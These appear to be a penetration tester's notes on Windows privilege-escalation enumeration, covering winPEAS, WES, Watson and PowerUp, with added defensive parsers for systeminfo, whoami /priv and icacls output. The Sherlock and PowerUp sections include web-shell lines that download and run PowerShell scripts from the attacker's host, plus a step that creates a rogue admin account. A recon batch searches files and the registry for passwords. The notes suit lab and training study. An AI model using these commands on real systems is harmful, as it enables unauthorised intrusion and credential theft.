# 2 Enums

## Enumeration

1. Check your username and groups:
   1. whoami
   2. whoami /priv
   3. net user %USERNAME%
2. winPEAS fast, searchfast, cmd
   1. [TransferFiles](/06-linux-privesc/04-transfer-files.md)
3. Seatbelt and other scripts
4. If scripts fail, run manually
5. Other Win PrivEsc cheatsheets:
   1. <http://www.fuzzysecurity.com/tutorials/16.html> --Windows enums

```
systeminfo                ..OS build, Proc:x64, OS:x86 - Suggester
hostname
whoami /priv              ..for Token Impersonation (Potato Exploits)
net users
net user Administrator
cmdkey /list              ..look for saved passwords
```

## systeminfo

* Find Kernel Exploits with systeminfo and WES
* They can cause system-crash
* Find matching exploits: google, exploitdb, github
* <https://github.com/SecWiki/windows-kernel-exploits>

```
cd C:\Windows\Temp
systeminfo > sys.txt
copy sys.txt \\10.x.x.x\share\

N/A hotfixes?
Confirm here:
dir C:\Windows\SoftwareDistribution\Download    ..updates staged from WSUS
type C:\Windows\WindowsUpdate.log               ..actual update logs
```
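Added example (Python, not from these notes and not WES code): a small parser for a `systeminfo` dump that pulls out the OS version and the installed KB list and diffs it against a patch baseline, which is the comparison WES and the Exploit Suggester do against their databases. Both dumps and the baseline KB numbers are constructed for the example. A `Hotfix(s): N/A` dump (the case the block above says to confirm on the host) is reported as unknown rather than as "nothing missing".

```python
import re

# Constructed systeminfo excerpt (not captured from a real host).
SYSTEMINFO_SAMPLE = """Host Name:                 LAB-WS01
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB2999226
                           [03]: KB3000061
"""

# Same host, but hotfix enumeration failed (the 'N/A hotfixes?' case above).
SYSTEMINFO_NA_SAMPLE = """Host Name:                 LAB-WS01
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
"""

# Top-level 'Key:   value' lines; the indented '[nn]: KBxxxx' lines do not match.
FIELD_RE = re.compile(r"^([A-Za-z][^:]*?):\s+(.*)$")
KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")


def parse_systeminfo(text):
    """Extract the fields a patch check needs from `systeminfo` output."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    return {
        "os_name": fields.get("OS Name"),
        "os_version": fields.get("OS Version"),
        "system_type": fields.get("System Type"),
        "hotfixes": KB_RE.findall(text),
        # True when systeminfo could not enumerate hotfixes at all.
        "hotfix_listing_unavailable": fields.get("Hotfix(s)", "").upper().startswith("N/A"),
    }


def missing_hotfixes(text, required_kbs):
    """KBs from `required_kbs` that the dump does not list as installed.

    Returns None for a 'Hotfix(s): N/A' dump: an empty list would read as
    'fully patched', which is the wrong conclusion. Confirm on the host
    (SoftwareDistribution\\Download, WindowsUpdate.log) instead.
    """
    info = parse_systeminfo(text)
    if info["hotfix_listing_unavailable"]:
        return None
    return sorted(set(required_kbs) - set(info["hotfixes"]))


if __name__ == "__main__":
    # Constructed baseline; in practice it comes from the bulletin you are checking.
    baseline = ["KB2999226", "KB3000061", "KB4012212"]
    print(parse_systeminfo(SYSTEMINFO_SAMPLE)["os_version"])
    print("missing:", missing_hotfixes(SYSTEMINFO_SAMPLE, baseline))
    print("missing (N/A dump):", missing_hotfixes(SYSTEMINFO_NA_SAMPLE, baseline))
```

On a real box, feed it the file written by `systeminfo > sys.txt`; the baseline KB list should come from the vendor bulletin you are checking against.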

## google

```
whoami
hostname
systeminfo   .. OS, Version, Hotfixes

google: "windows server 2008 6.1.7600 N/A Build 7600 privilege Escalation"
google: "windows 7 enterprise 6.1.7600 priv esc vulnerabilities"

found: 
github/abatchy17/WindowsExploits > 
MS11-046.exe, MS10-059.exe     ..failed
Github/Re4son/chimichurri.exe  ..worked (arctic-htb)
and
MS11-046 (AFD PrivEsc)         ..develHTB
```

## Tasklist

```
tasklist /V
```

## Windows Exploit Suggester

* Lots of findings.. just have to look through them!
* MS10-059 = [chimichurri](/07-win-privesc/win-kernelexp.md#chimichurri)

```
windows-exploit-suggester.py --database 2019-08-27-mssb.xls --systeminfo sys.txt
```

## WES

```
curl -k "https://raw.githubusercontent.com/bitsadmin/wesng/master/wes.py" > ./wes.py
python3 wes.py --update 
python wes.py /share/systeminfo.txt -i 'Elevation of Privilege' --exploits-only | more
python wes.py ./sys.txt -s critical -i "Remote Code Execution"
```

## WESng

* Based on win-ver and patch level
* <https://github.com/bitsadmin/wesng>

```
> curl -k "https://raw.githubusercontent.com/bitsadmin/wesng/master/wes.py" > ./wes.py
> python3 wes.py --update 
> python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only
> python ./wes.py ~/htb/arctic/systeminfo.txt -i 'Elevation of Privilege' --exploits-only  
```

## Kernel Exploits

* Compare to 'systeminfo' report
* <https://github.com/SecWiki/windows-kernel-exploits>
* <https://github.com/rasta-mouse/Watson> ..for recent windows
* USE: [WinKernelExploits](/07-win-privesc/win-kernelexp.md)

## Check Perms

```
accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe" 
accesschk.exe /accepteula -quv user CleanUp.ps1
```

## User whoami privs

Privileges give your account special rights.

```
whoami /priv
```

Note: if a privilege is listed, you have it!\
Even if it says 'Disabled' you still have it (Disabled only means it is not currently enabled in the token).

* SeImpersonatePrivilege\
  Allows impersonating a client after authentication. Ex: [Juicy Potato](/07-win-privesc/win-privesc.md#juicy-potato)
* SeAssignPrimaryTokenPrivilege\
  Similar. Enables the user to assign an access token to a new process.\
  Ex: [Juicy Potato](/07-win-privesc/win-privesc.md#juicy-potato)
* SeBackupPrivilege\
  Grants read access to ALL objects.\
  Could find sensitive files/hashes/registry.
* SeRestorePrivilege\
  Grants write access to all objects: overwrite binaries/DLLs/registry.
* SeTakeOwnershipPrivilege\
  Can take ownership and then write: overwrite binaries/DLLs/registry.
* Advanced:\
  SeTcbPrivilege\
  SeCreateTokenPrivilege\
  SeLoadDriverPrivilege\
  SeDebugPrivilege (used in getsystem)
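Added example (Python; not code from these notes): parses `whoami /priv` output and flags the privileges listed above, treating a Disabled entry as held, since the State column only says whether the privilege is currently enabled in the token. The sample output is constructed. For a defender the same list is the audit: a service or web-app account holding SeImpersonatePrivilege or SeBackupPrivilege it does not need should lose it in User Rights Assignment.

```python
import re

# High-impact privileges from the list above, with what each one lets a token do.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate a client after authentication",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeBackupPrivilege": "read any file or registry key regardless of ACL",
    "SeRestorePrivilege": "write any file or registry key regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "create arbitrary access tokens",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeDebugPrivilege": "open and debug any process",
}

# Constructed `whoami /priv` output (not captured from a real host).
WHOAMI_PRIV_SAMPLE = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Disabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One privilege row: name, free-text description, then Enabled/Disabled.
PRIV_LINE_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege_name: state} for every privilege row in the output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def high_risk_privileges(text):
    """(name, state, reason) for each held high-risk privilege.

    A Disabled row is still reported: the privilege is present in the
    token and can be enabled; only a missing row means it is not held.
    """
    return [
        (name, state, HIGH_RISK[name])
        for name, state in parse_whoami_priv(text).items()
        if name in HIGH_RISK
    ]


if __name__ == "__main__":
    for name, state, reason in high_risk_privileges(WHOAMI_PRIV_SAMPLE):
        print(f"{name} [{state}]: {reason}")
```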

## Windows Service Configuration Viewer

* Check for misconfigs in services that can lead to privilege escalation.
* If the service binary is writable by you, you can replace the executable with your own and have Windows execute whatever code you want as the privileged user.

```
icacls scsiaccess.exe

scsiaccess.exe
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
Everyone:(I)(F)                 ..Everyone has Full control: any user can overwrite the binary
```
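Added example (Python; not part of these notes or of any tool named here): an `icacls` output parser that reports ACEs granting write-class rights to principals every local user belongs to, which is exactly what makes the listing above exploitable (Everyone has Full control on the service binary). The sample output is constructed to mirror the listing; the low-privilege principal set is an assumption to adjust per environment. Deny ACEs and inheritance flags are handled so that something like `(DENY)(W)` is not reported as write access.

```python
import re

# Rights that let a principal modify the file, its ACL or its owner.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WDAC", "WO", "D", "DE"}
# Inheritance / propagation flags icacls prints alongside the rights.
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Principals any local user is a member of (assumption; adjust per environment).
LOW_PRIV_PRINCIPALS = {
    r"Everyone",
    r"BUILTIN\Users",
    r"NT AUTHORITY\Authenticated Users",
    r"NT AUTHORITY\INTERACTIVE",
    r"APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES",
}

# Constructed icacls output in its real layout (path on the first line only).
ICACLS_SAMPLE = r"""scsiaccess.exe NT AUTHORITY\SYSTEM:(I)(F)
               BUILTIN\Administrators:(I)(F)
               BUILTIN\Users:(I)(RX)
               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
               Everyone:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_icacls(output, path):
    """Return [(principal, rights, is_deny)] from `icacls <path>` output.

    Each ACE is printed as 'principal:(flag)(flag)(rights)'; rights may be
    a comma list such as (RX,W), and deny ACEs carry a (DENY) token.
    """
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        if ":(" not in line:
            continue  # blank or summary line
        principal, _, perm_part = line.partition(":(")
        tokens = re.findall(r"\(([^)]*)\)", "(" + perm_part)
        is_deny = "DENY" in tokens
        rights = set()
        for tok in tokens:
            if tok in INHERITANCE_FLAGS or tok == "DENY":
                continue
            rights.update(t for t in tok.split(",") if t)
        aces.append((principal, rights, is_deny))
    return aces


def weak_write_aces(output, path, low_priv=LOW_PRIV_PRINCIPALS):
    """Allow-ACEs giving a low-privileged principal write-class rights."""
    findings = []
    for principal, rights, is_deny in parse_icacls(output, path):
        granted = rights & WRITE_RIGHTS
        if not is_deny and principal in low_priv and granted:
            findings.append((principal, sorted(granted)))
    return findings


if __name__ == "__main__":
    for principal, rights in weak_write_aces(ICACLS_SAMPLE, "scsiaccess.exe"):
        print(f"WRITABLE by {principal}: {','.join(rights)}")
```

The fix on the host side is to remove the offending ACE so that only Administrators and SYSTEM can modify a binary that runs as a service.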

## Watson

* .NET tool that finds missing patches
* <https://github.com/rasta-mouse/Watson>
* Check the target's .NET version and build that version in Visual Studio

```
> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
.NET v3.5                        ..target's version
Build > match the target's .NET version and OS arch (x86)

\\10.10.14.34\share\Watson.exe
Watson found 5 vulns
Including: MS11-046
```

## Sherlock

* Example from [DrupalPhpVuln](/04-webapps/drupal.md#serialization-vulnerability-41564-php)

```
locate Sherlock.ps1
cp Sherlock.ps1 .
dos2unix Sherlock.ps1  ..fixed some bad unicode (at beginning)
vim Sherlock.ps1       ..add 'Find-AllVulns' as last line

http://10.x.x.x/ippsec.php?fexec=
=echo IEX(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/Sherlock.ps1')|powershell -noprofile -

Found:
MS15-051 ClientCopyImage not-vulnerable (but ippsec disagrees, try this)
MS16-016 WebDAV ..requires 2 processors and race-condition ..let's ignore
```

## UACME

* Tries 30+ ways to PrivEsc
* "You AC Me Bro"
* <https://github.com/hfiref0x/UACME>

## UAC Bypass

* User Account Control
* Metasploit has 'bypassuac' for Windows7
* PowerShell Empire that prompts in a nice way

## BeRoot

* Check for misconfigs in Win or Linux
* C:\Tools\beRoot.exe
* Found lots of vulns for PrivEsc

## PowerUp Scan

* Powershell script to find PrivEsc Vulns and Exploit
* PowerShell > PowerShellEmpire > PowerUp.ps1
* <https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1>

```
locate PowerUp.ps1  (empire)
cp PowerUp.ps1 .
vim PowerUp.ps1     ..add 'Invoke-AllChecks' as last line
python -m SimpleHTTPServer

Send to victim (ex: Drupal)
http://10.x.x.x/ippsec.php?fexec=systeminfo
=echo IEX(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/PowerUp.ps1')|powershell -noprofile -

Found a few 'writable directories' for oracle, but nothing great
ex: c:\oracle\ora90\bin
netstat -an     ..3306 mysql, but not oracle (1521)
```

## PowerUp Abuse

* Abuse functions:
  * Write-UserAddMSI
  * Write-ServiceBinary ..will create user 'john' with password123 as admin!

```
locate PowerUp.ps1
cp PowerUp.ps1 .
python -m SimpleHTTPServer        ..share

Send the file to victim           ..example from Drupal
http://10.x.x.x/ippsec.php?fexec=systeminfo
=echo IEX(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/PowerUp.ps1')|powershell -noprofile -

PS> Import-Module .\PowerUp.ps1   ..run as Admin if you can
PS> Invoke-AllChecks              ..scan

----------------------------------
Found: Unquoted Path:
C:\Program Files\VideoStream\1337 Log\Checklog.exe

Exploit:
Will create a new user 'john' with Password 123! and Local Admin!
(after a reboot/service restart)
PS> Write-ServiceBinary -ServiceName 'Video Stream' -ServicePath "C:\Program Files\VideoStream\1337.exe"
```
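Added example (Python; not PowerUp's code): detects the unquoted-service-path defect PowerUp reported above straight from `sc qc` output or from a service-to-ImagePath table, and produces the quoted value an administrator would set as the service binPath to close it. The `sc qc` text and the service table are constructed. The rule applied is the standard one: a path is a finding only when it is not wrapped in quotes and the executable portion contains a space, so `svchost.exe -k netsvcs` and already-quoted paths are not flagged.

```python
import re

# Constructed `sc qc` output for a service with the defect (not a real host).
SC_QC_SAMPLE = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VideoStream
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\VideoStream\1337 Log\Checklog.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Video Stream
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# Constructed service -> ImagePath table, as collected from
# `wmic service get name,pathname` or the Services registry key.
SERVICES_SAMPLE = {
    "VideoStream": r"C:\Program Files\VideoStream\1337 Log\Checklog.exe",
    "GoodSvc": r'"C:\Program Files\Good Vendor\svc.exe" -run',
    "Schedule": r"C:\Windows\system32\svchost.exe -k netsvcs",
    "Updater": r"C:\Program Files\Some Vendor\updater.exe -service",
}


def binary_path_from_sc_qc(text):
    """Pull BINARY_PATH_NAME out of `sc qc <service>` output (None if absent)."""
    for line in text.splitlines():
        key, _, value = line.strip().partition(":")
        if key.strip() == "BINARY_PATH_NAME":
            return value.strip()
    return None


def split_image_path(image_path):
    """Return (executable, arguments, was_quoted) for a service ImagePath."""
    p = image_path.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return p[1:end], p[end + 1:].strip(), True
    # Unquoted: treat everything up to the first '.exe' as the executable.
    m = re.match(r"(.*?\.exe)\b(.*)", p, re.IGNORECASE)
    if m:
        return m.group(1), m.group(2).strip(), False
    return p, "", False


def is_unquoted_with_spaces(image_path):
    """True when the executable path is unquoted and contains a space."""
    exe, _, quoted = split_image_path(image_path)
    return (not quoted) and (" " in exe)


def quoted_image_path(image_path):
    """Hardened form of the path: executable quoted, arguments kept."""
    exe, args, _ = split_image_path(image_path)
    return f'"{exe}"' + (f" {args}" if args else "")


def find_unquoted_services(services):
    """Names of services whose ImagePath has the defect, sorted."""
    return sorted(name for name, path in services.items() if is_unquoted_with_spaces(path))


if __name__ == "__main__":
    path = binary_path_from_sc_qc(SC_QC_SAMPLE)
    print("sc qc path:", path, "->", "FINDING" if is_unquoted_with_spaces(path) else "ok")
    for name in find_unquoted_services(SERVICES_SAMPLE):
        print(f"{name}: set binPath to {quoted_image_path(SERVICES_SAMPLE[name])}")
```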

## SharpUp

SharpUp - good if you don't have PowerShell\
C# compiled version: <https://github.com/GhostPack/SharpUp> <https://github.com/r3motecontrol/Ghostpack-CompiledBinaries>

```
win ps or cmd: 
> SharpUp.exe
```

## Seatbelt

Enumeration, but doesn't hunt for privesc

GhostPack/Seatbelt\
<https://github.com/GhostPack/Seatbelt>\
Compiled binary (Seatbelt.exe): <https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/>

```
Seatbelt.exe ...help 
Seatbelt.exe all 
Seatbelt.exe NonstandardServices
```

## winPEAS

Hunts for privesc, highlights\
Most powerful tool in this course!\
Most maintained tool

carlospolop winPEAS\
<https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS>

Enable cmd colors:\
reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

If you can't get colors,\
try running it from kali on a reverse shell

```
cd C:\PrivEsc
winPEASany.exe -h
winPEASany.exe                   .. default: all
winPEASany.exe userinfo
winPEASany.exe quiet procesinfo  .. (yes, misspelled)
```

## accesschk

Older but trustworthy tool to check ACLs\
Checks access for a user/group to a file/dir/service/registry key\
Downside: sometimes a GUI EULA popup (older versions don't)

## Quick-Paste-Report

* Copy/Paste into your remote Windows shell to generate a quick report:

```
@echo --------- BASIC WINDOWS RECON --------- > report.txt
rem timeout needs a console; in a shell with redirected stdin it errors out, so drop the timeout lines there
timeout 1
net config Workstation >> report.txt
timeout 1
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> report.txt
timeout 1
hostname >> report.txt
timeout 1
net users >> report.txt
timeout 1
ipconfig /all >> report.txt
timeout 1
route print >> report.txt
timeout 1
arp -a >> report.txt
timeout 1
netstat -ano >> report.txt
timeout 1
rem netsh firewall is deprecated on newer Windows; there use: netsh advfirewall show allprofiles
netsh firewall show state >> report.txt
timeout 1
netsh firewall show config >> report.txt
timeout 1
schtasks /query /fo LIST /v >> report.txt
timeout 1
tasklist /SVC >> report.txt
timeout 1
net start >> report.txt
timeout 1
DRIVERQUERY >> report.txt
timeout 1
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt
timeout 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt
timeout 1
dir /s *pass* == *cred* == *vnc* == *.config* >> report.txt
timeout 1
findstr /si password *.xml *.ini *.txt >> report.txt
timeout 1
reg query HKLM /f password /t REG_SZ /s >> report.txt
timeout 1
reg query HKCU /f password /t REG_SZ /s >> report.txt
timeout 1
dir "C:\" >> report.txt
timeout 1
dir "C:\Program Files\" >> report.txt
timeout 1
dir "C:\Program Files (x86)\" >> report.txt
timeout 1
dir "C:\Users\" >> report.txt
timeout 1
dir "C:\Users\Public\" >> report.txt
timeout 1
echo REPORT COMPLETE!
```
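Added example (Python; not from these notes): a triage helper for the `report.txt` the batch above produces. It finds the two `reg query` results for AlwaysInstallElevated and reports the policy as effective only when both the HKLM and the HKCU value are 1, which is what Windows Installer requires; a single hive set to 1, or a key that is absent from the report because `reg query` wrote its error to stderr, is not a finding. The report excerpts are constructed.

```python
import re

# Constructed report.txt excerpts (not from a real host).
REPORT_ONE_HIVE = r"""--------- BASIC WINDOWS RECON ---------
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19044 N/A Build 19044
LAB-WS01

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x0

"""

REPORT_BOTH_HIVES = r"""--------- BASIC WINDOWS RECON ---------
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""

# The key header `reg query` prints before the value line, per hive.
HIVE_PREFIXES = {
    "HKLM": r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer",
    "HKCU": r"HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer",
}
VALUE_RE = re.compile(r"AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9A-Fa-f]+)")


def installer_policy_values(report_text):
    """{'HKLM': value_or_None, 'HKCU': value_or_None} scraped from the report.

    A value line is attributed to the hive whose key header was seen most
    recently; a hive with no header in the report stays None.
    """
    values = {"HKLM": None, "HKCU": None}
    current = None
    for line in report_text.splitlines():
        stripped = line.strip()
        for hive, prefix in HIVE_PREFIXES.items():
            if stripped.upper().startswith(prefix.upper()):
                current = hive
        m = VALUE_RE.search(stripped)
        if m and current:
            values[current] = int(m.group(1), 16)
    return values


def always_install_elevated_effective(report_text):
    """True only when both hives set the value to 1."""
    v = installer_policy_values(report_text)
    return v["HKLM"] == 1 and v["HKCU"] == 1


if __name__ == "__main__":
    for label, report in (("one hive", REPORT_ONE_HIVE), ("both hives", REPORT_BOTH_HIVES)):
        print(label, installer_policy_values(report),
              "EFFECTIVE" if always_install_elevated_effective(report) else "not effective")
```

The remediation is the policy "Always install with elevated privileges" set to Disabled in both Computer and User Configuration; the check above is what confirms that on a collected report.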

## Problems

Enums failing? Couldn't get Watson or winPEAS.exe to work.

.NET might be old. Example: 'Granny' had .NET v1.0.

```
> dir C:\Windows\Microsoft.NET\Framework
> reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\NET Framework Setup\NDP"
```

Consider trying an older version of Watson:\
<https://github.com/rasta-mouse/Watson/tree/486ff207270e4f4cadc94ddebfce1121ae7b5437>

Use the .bat instead!

```
C:\Temp>winPEAS.bat
```

Nothing happened? Prefixing it with cmd /k worked.\
If you check cmd /?, the /k switch carries out the command specified by string but remains.\
I suspect cmd /c would work as well but never tried that.

```
C:\WINDOWS\Temp\Temp>cmd /k winPEAS.bat > output.txt

Parsing Mof File: C:\WINDOWS\system32\wbem\Cli.mof(Phase Error - 3)
Compiler returned error 0x80041001
etc...
```

Ok results, but not great...

## More...


